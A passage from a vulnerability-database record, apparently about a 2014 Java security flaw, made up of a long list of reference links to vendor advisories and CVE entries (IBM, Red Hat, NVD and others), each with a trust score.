"http://www-01.ibm.com/support/docview.wss?uid=swg21681256" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683484" }, { "trust": 2.1, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096132" }, { "trust": 2.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-0675.html" }, { "trust": 2.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-0685.html" }, { "trust": 1.9, "url": "http://www.securityfocus.com/bid/66914" }, { "trust": 1.9, "url": "http://security.gentoo.org/glsa/glsa-201502-12.xml" }, { "trust": 1.9, "url": "http://www.ubuntu.com/usn/usn-2191-1" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673836" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678113" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679713" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680387" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681018" }, { "trust": 1.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675343" }, { "trust": 1.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675588" }, { "trust": 1.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21677387" }, { "trust": 1.8, "url": "https://www.ibm.com/support/docview.wss?uid=swg21674530" }, { "trust": 1.8, "url": "http://www.debian.org/security/2014/dsa-2912" }, { "trust": 1.8, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2014:0413" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 1.8, "url": "http://secunia.com/advisories/58415" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59022" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59023" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59071" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59082" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59104" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59194" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59250" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59255" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59307" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59324" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59436" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59438" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59653" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59675" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59722" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59733" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60003" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60111" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60117" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60498" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60574" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60580" }, { "trust": 1.8, "url": "http://secunia.com/advisories/61050" }, { "trust": 1.8, "url": "http://secunia.com/advisories/61264" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2187-1" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10698" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140852974709252\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140852886808946\u0026w=2" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0453" }, { "trust": 0.8, "url": "http://www.ipa.go.jp/security/ciadr/vul/20140416-jre.html" }, { "trust": 0.8, "url": "http://www.jpcert.or.jp/at/2014/at140017.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0453" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0446" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0429" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2412" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2414" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0451" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2398" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0458" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0459" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0452" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0460" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0461" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0453" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1876" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0457" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0456" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2403" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2397" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0449" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6629" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0455" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0454" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6954" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2409" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2402" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0448" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2421" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2401" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687297" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678113" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-009/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685689" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/java_apr2014_advisory.asc" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680565" }, { "trust": 0.3, "url": "https://www.suse.com/support/update/announcement/2014/suse-su-20140639-1.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21685350" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180008" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678048" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398943" }, { "trust": 0.3, "url": "\thttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398922" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675343" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681114" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21689151" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/#oracle_april_15_2014_cpu" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_systems_director_storage_control_is_affected_by_vulnerabilities_in_ibm_java_sdk_cve_2014_0453_cve_2013_5772_cve_2013_5803_cv" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676528" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676752" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21680036" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004969" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59550" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59555" }, { "trust": 0.3, "url": "\\https://www-304.ibm.com/support/docview.wss?uid=swg21677490" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677490" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673611" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676860" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679417" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180257" }, { "trust": 0.3, "url": "asa-2014-203" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679172" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680490" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684716" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677072" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687813" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674530" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679197" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682529" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682526" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675588" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673013" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672047" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020184" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679187" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682644" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677387" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678302" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674132" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680562" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673576" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679067" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21664899" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675205" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2427" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2423" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2413" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0432" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2420" }, { "trust": 0.2, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0459.html" }, { "trust": 0.2, "url": "https://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0454.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0448.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0455.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2402.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0462" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2405" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10698" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852886808946\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852974709252\u0026amp;w=2" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-0453" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2187-1/" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0486.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2428" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0432.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0413.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2397.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2413.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2422.html" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0455" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6531" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6532" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2409" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4266" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4219" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4209" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4263" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6468" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4247" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6511" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4265" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6504" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2402" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4221" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6527" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4227" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4252" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4244" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4262" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2490" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4208" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6492" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6512" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4264" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6466" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4288" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2483" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4223" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2428" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6502" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4268" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4218" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4220" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2413" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6515" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5887" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0878.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5910" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0982.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0417" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5878" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5907" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0376" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0368" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0428" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0422" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5884" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0423" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0410" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5898" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5889" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0424" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0416" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0373" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5888" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5899" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0403" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0375" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5896" }, { "trust": 0.1, "url": 